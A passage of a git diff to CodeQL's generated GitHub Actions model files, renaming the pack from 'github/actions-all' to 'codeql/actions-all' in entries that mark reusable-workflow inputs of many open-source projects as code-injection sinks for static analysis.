a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index f0daee8757ea..6d4259a45e52 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 85d3b564a78c..35d6bbd1b7bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 01bda56c9a9b..9dd893ca3b2a 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 4c9e9b1dc8fc..10dfdc0c63ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 30e54f94fc17..fdc59aeb23da 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index bb0c172bf0e1..4b520ea39546 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 3a5ad21b22af..f8630968c45f 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index c161072bd3d8..4cf11f56fdf6 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index 0362312f27a1..44ad4f730764 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index 2ae5aab3b2cd..4d7af6469019 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index e2c8ae625c20..0f525b146074 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 13461b602054..fc96f1497e01 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 88e02dd04c45..a57f0a860696 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 2f368497f013..ce86ebf49116 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index 64f3c2085402..05212ab32641 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 9c2d7a421db8..6d40d72d019a 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 1410fd6fbe98..f5ac697360b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index eca441b608a2..95140465bfc4 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 2868aecd064e..30cf3f54a2fa 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 0aa2d1c596c7..90937f50a3f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 02fe1b2055f6..ec6a7385187c 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 9f6401ec03e9..5079e80e7610 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 373b507f2f30..ccaf2628951d 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 9b68b660586b..56344ff35b64 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index ddce9773100d..f2b4cd4eff31 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index 3aa599e00d70..f38f0d43c4c8 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index 4ff3377e6ebd..85e61e866dc0 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 577ffa78d821..9f984f488f7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index 99ff06a4aee3..f13f9b871142 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5241bc1bcb1e..b021069745f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 66221185cbdb..dae9a68727e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index eb5207528d4f..4ea3849560dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 1337b0e76ec4..ff4b4ccf353e 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index 1d8b8f0e9f1b..d3649a5ebf33 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index 4eaa610a3a2b..22ff2d5a29be 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index a62139e12c47..f151d0a2c20f 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index 2f3f85fe424c..e08f9de22977 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index f39a027eda7c..fc009bce95a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index 5a0b692e4e18..5e5870c64c7e 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index ae902cb95ab6..2262cf5115f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 78379dd7796c..a18ef96e87e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 0eeed9a1f17e..2ea0842c72bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 3ab501e1b1f3..65f027175b21 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index caa0ee6d7cb1..14c3c8378c6d 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index b660b0bc4ec3..c1a51cefdcdb 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 0fe5470bb11a..c9b7394f044d 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index a9cd5759cf2a..36c50c6ad506 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 5b0dc5da53d2..fc0607380ffe 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index c90d1ac8afbd..122a61c76fbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", 